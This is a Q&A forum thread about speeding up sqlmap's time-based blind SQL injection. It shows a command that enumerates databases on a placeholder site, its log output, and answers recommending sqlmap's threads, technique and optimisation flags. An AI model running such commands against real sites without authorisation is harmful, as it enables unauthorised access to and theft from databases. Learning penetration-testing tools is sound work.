sqlmap is too slow

Question

Here's an example. Just trying to list the databases:

python sqlmap.py -u "http://somesite.com/?id=1" --dbs

[15:20:32] [INFO] fetching database names
[15:20:32] [INFO] fetching number of databases
[15:20:32] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:20:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
2
[15:20:55] [INFO] adjusting time delay to 2 seconds due to good response times
2
[15:20:58] [INFO] retrieved: 100_MYDB
[15:22:39] [INFO] retrieved: DEV_GC_DATASTORAGE
[15:26:15] [INFO] retrieved: GC_

You can see in the timestamps it takes about 3 minutes to list 1 database name, it goes character by character, each character takes ~7 seconds. The tutorials I've seen on youtube are superfast... What can I do to speed this up? I've tried messing with .conf

Thanks.

What is the network latency to `somesite.com`? You can check this by simply doing `ping somesite.com`. If the latency is high, doing blind SQL injection will be slow as you test char by char. — rgerganov, Jul 04 '12 at 19:43
Wow, this might be the problem. Any idea why? I assumed it wasn't the site's fault because it loads super quickly in the browser. But requests are timing out in pings. — Farzher, Jul 04 '12 at 21:02

score 2 · Answer 1 · answered Jan 12 '13 at 07:48

2

You can also use the -o switch for some optimizations. Also try --technique=BEUS

answered Jan 12 '13 at 07:48

mmeyer2k

422
5
10

score 1 · Accepted Answer · answered Jul 18 '12 at 20:38

1

What is the network latency to somesite.com? You can check this by simply doing ping somesite.com. If the latency is high, doing blind SQL injection will be slow as you test char by char. – rgerganov Jul 4 at 19:43

answered Jul 18 '12 at 20:38

Farzher

13,934
21
69
100

score 1 · Answer 3 · answered Sep 21 '16 at 08:49

1

Use more threads. Default is 1:

       --threads=THREADS
          Max number of concurrent HTTP(s) requests (default 1)

answered Sep 21 '16 at 08:49

Jonas Lejon

3,189
3
28
26

score -1 · Answer 4 · answered Jul 11 '17 at 18:39

-1

you can use like this for response fast. sqlmap -u "http://somesite.com/?id=1" --time-sec 15

answered Jul 11 '17 at 18:39

Sajid

31
1
5

This will literally triple the amount of time it takes for a time-based injection test. Default is 5. For this parameter; the lower it is, the faster the dbms responds. – uofc Jul 30 '19 at 03:40

sqlmap is too slow

4 Answers4